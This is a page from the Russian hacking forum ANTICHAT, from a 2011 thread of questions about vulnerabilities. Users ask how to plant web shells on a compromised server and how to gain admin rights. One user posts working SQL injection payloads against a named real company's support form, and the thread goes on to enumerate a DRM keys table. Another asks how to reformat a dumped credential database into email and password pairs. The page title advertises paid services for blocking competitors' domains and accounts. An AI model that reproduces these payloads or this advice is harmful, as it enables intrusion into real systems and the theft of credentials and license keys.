УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1799 из 2438

1799

Опции темы

Поиск в этой теме

Опции просмотра

#17981

24.08.2011, 02:18

Ulitko

Guest

Сообщений: n/a

Провел на форуме:
4389

Репутация: 0

искал, гуглил, но не нашел мануала как рутать винду оО. Консолька в всо не канает. Мб кто подкинет мануальчик?

#17982

24.08.2011, 05:09

XAMEHA

Новичок

Регистрация: 15.05.2010

Сообщений: 0

Провел на форуме:
2268

Репутация: 0

Цитата:

Сообщение от Ulitko

Ulitko said:
искал, гуглил, но не нашел мануала как рутать винду оО. Консолька в всо не канает. Мб кто подкинет мануальчик?

Не рутать, а получить права админа. Для этого есть эксплоиты, для начала посмотри это видео: https://forum.antichat.net/showpost.php?p=2770920&postcount=1

#17983

24.08.2011, 10:47

GroM88

Познающий

Регистрация: 25.10.2007

Сообщений: 46

Провел на форуме:
318186

Репутация: 2

Отправить сообщение для GroM88 с помощью ICQ

Народ) собсно такой вопрос...

Вообщем есть скуль с правами Y, но нет папки на запись... инклуда тоже нет = \

Вообщем то нарыл доступ по ssh к этому серверу.....

но права у юзера уг

у моего юзера например директория /home/myuser а сайт лежит в дириктории /home/siteuser/

Можно ли как то залить шелл в корень сайта?)

Порутать сервак не получится = \ т.к.

Linux 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686 athlon i386 GNU/Linux

Есть какие нибудь варианты как залить шелл ?))

#17984

24.08.2011, 18:45

ne0k

Guest

Сообщений: n/a

Провел на форуме:
10960

Репутация: 0

Цитата:

Сообщение от None

Можно ли как то залить шелл в корень сайта?)

Почему обязательно в корень сайта? Можно залить и скажем в images и другие подобные директории открытые на запись.. А потом, если необходимо, переместить шелл в корень...

Через SSH просмотри в /home/siteuser/ любую открытую на запись директорию, и лей, лей..

#17985

24.08.2011, 19:16

KUKLOVOD2

Guest

Сообщений: n/a

Провел на форуме:
31256

Репутация: 1

здравствуйте, нашел интересную иньекцию, судя по всему mssql.Если в данной форме

Цитата:

Сообщение от None

http://www.socketmobile.com/support/wifi/pw.asp

ввести кавычку, вылетает ошибка.Как такое можно раскрутить?

#17986

25.08.2011, 04:55

RexTiam

Постоянный

Регистрация: 02.11.2009

Сообщений: 341

Провел на форуме:
599124

Репутация: 65

KUKLOVOD2, там не только эта бага)

но ссылку твою не получилось раскрутить

#17987

25.08.2011, 20:06

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

Цитата:

Сообщение от RexTiam

RexTiam said:
KUKLOVOD2, там не только эта бага)
но ссылку твою не получилось раскрутить

POST http://www.socketmobile.com/support/wifi/pw.asp

POSTDATA(вариант 1): Email=1')+UNION+SELECT+1,2,@@version,4--+&submit=Send+Registration+Key

POSTDATA(вариант 2):

Email=asd')+OR+1=@@version--+&submit=Send+Registration+Key

Result:

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)' to data type int.

#17988

26.08.2011, 17:42

KUKLOVOD2

Guest

Сообщений: n/a

Провел на форуме:
31256

Репутация: 1

значит все пытаюсь раскрутить эту скулю.Наблюдается интересное явление:при запросе

Цитата:

Сообщение от None

Email=1')+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFO RMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME='View_DRM_Keys'+AN D+COLUMN_NAME+NOT+IN+('asscode ','assigndate','AssignedDate','assignedtype','assi gnusername','binary_message_body','cdkey','CDSeria lNum'))--+&submit=Send+Registration+Key

мы видим что существует колонка code в таблице View_DRM_Keys.Но когда делаем выборку:

Цитата:

Сообщение от None

Email=1')+or+1=(SELECT+TOP+1+code+from+View_DRM_Ke ys)--+&submit=Send+Registration+Key

видим следующее:Invalid column name 'code'.Почему так?

Потом поэксперементировав я обнаружил, что вытаскивая колонки из разных таблиц, вытакскиваются колонки с одними и теме же именами, хотя в данных таблицах они могут и не существовать.Что можно предпринять?

#17989

27.08.2011, 00:30

Cherep

Новичок

Регистрация: 30.05.2010

Сообщений: 10

Провел на форуме:
42585

Репутация: 0

мб пишу не в правильную тему, но возникла такая проблема.

Сдампил бд mssql, там вот такой вид:

Код:

Code:
INSERT INTO tbl_xxx(id,password,accounttype,birthdate,BCodeTU,Email) VALUES ('login       ','password   ','0','Jan 01 1900 12:00AM','0','email');

как привести такие строчки к виду

Код:

Code:
mail;pass

???

#17990

27.08.2011, 00:33

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

сделай импорт базы, дальше возьми данные селектом, ну или спарси дамп))

Страница 1799 из 2438

1799

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход